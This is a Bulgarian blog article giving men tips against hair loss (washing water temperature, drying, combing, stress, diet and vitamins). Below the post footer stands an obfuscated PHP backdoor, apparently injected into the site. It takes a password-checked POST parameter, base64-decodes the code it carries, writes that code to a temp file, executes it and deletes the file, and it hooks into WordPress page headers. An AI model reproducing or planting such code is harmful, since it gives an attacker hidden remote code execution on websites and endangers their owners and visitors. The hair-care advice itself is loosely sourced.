Специално за мъже: как да опазим от оплешивяването – част 2 | Косопад

Специално за мъже: как да опазим от оплешивяването – част 2

kosopad-pri-muje

Ако имате силен косопад и се притеснявате, че ще оплешивеете, ви предлагаме ценни съвети, които ще са ви от полза и ще запазят косата си:

9. Температура на водата. Когато си мием косата, водата не трябва да е нито студена, нито гореща. Крайните температури са вредни за косата.

10. Как да се сушим. Не търкайте силно. Направете го с нежни попивания или оставете да съхне на въздух. За мъжете с дълга коса, завийте кърпата като тюрбан.

11. Температура на сешоара. Ако използваме сешоар, никога не трябва да е с максимална температура. Използвайте нормална температура.

12. Често ресане и кръвообращение. Друга често срещана грешка е, че ресането с четка подобрява кръвообращението. Трябва да използваме четка само, за да отстраните възлите.

opleshivqvane-recepti

13. Масаж на скалпа. Нежните масажи на скалпа са полезни, но много хора не си преценяват силата и предизвикват фрикция. Хората си мислят, че така увеличават кръвообращението, но не е точно така. Избягвайте масажите.

14. Внимавайте с мазнината. Това е рисков фактор при тийнейджърите. Излишната мазнина и акнето по скалпа може да са ранни признаци на андрогенен косопад.

15. А ако се обръснем? Колкото по- рано открием проблема, толкова по- лесно ще е решението. Бръсненето няма да промени ситуацията, само ще я прикрие.

16. Възстановяваме косата на 20 години. Някои алопеции започват при млади хора. Когато оплешивяването започне толкова рано, процесът може да се обърне, казват специалистите.

17. Стрес. Този фактор катализира косопада, особено след 30 годишна възраст. Но може да се контролира.

18. Грижи. Избирайте внимателно храненето си, тренирайте, спрете цигарите – това са трите най- важни съвета, които могат да запазят косата ни. Трябва да взимаме витамини А, В, С, Д и Е. Минерали като селен, силиций, магнезий, манган, също са много полезни за косата ни. Набавяйте си витамините и минералите най- вече от храната.

01. май 2015 18:34:29 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | 4 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}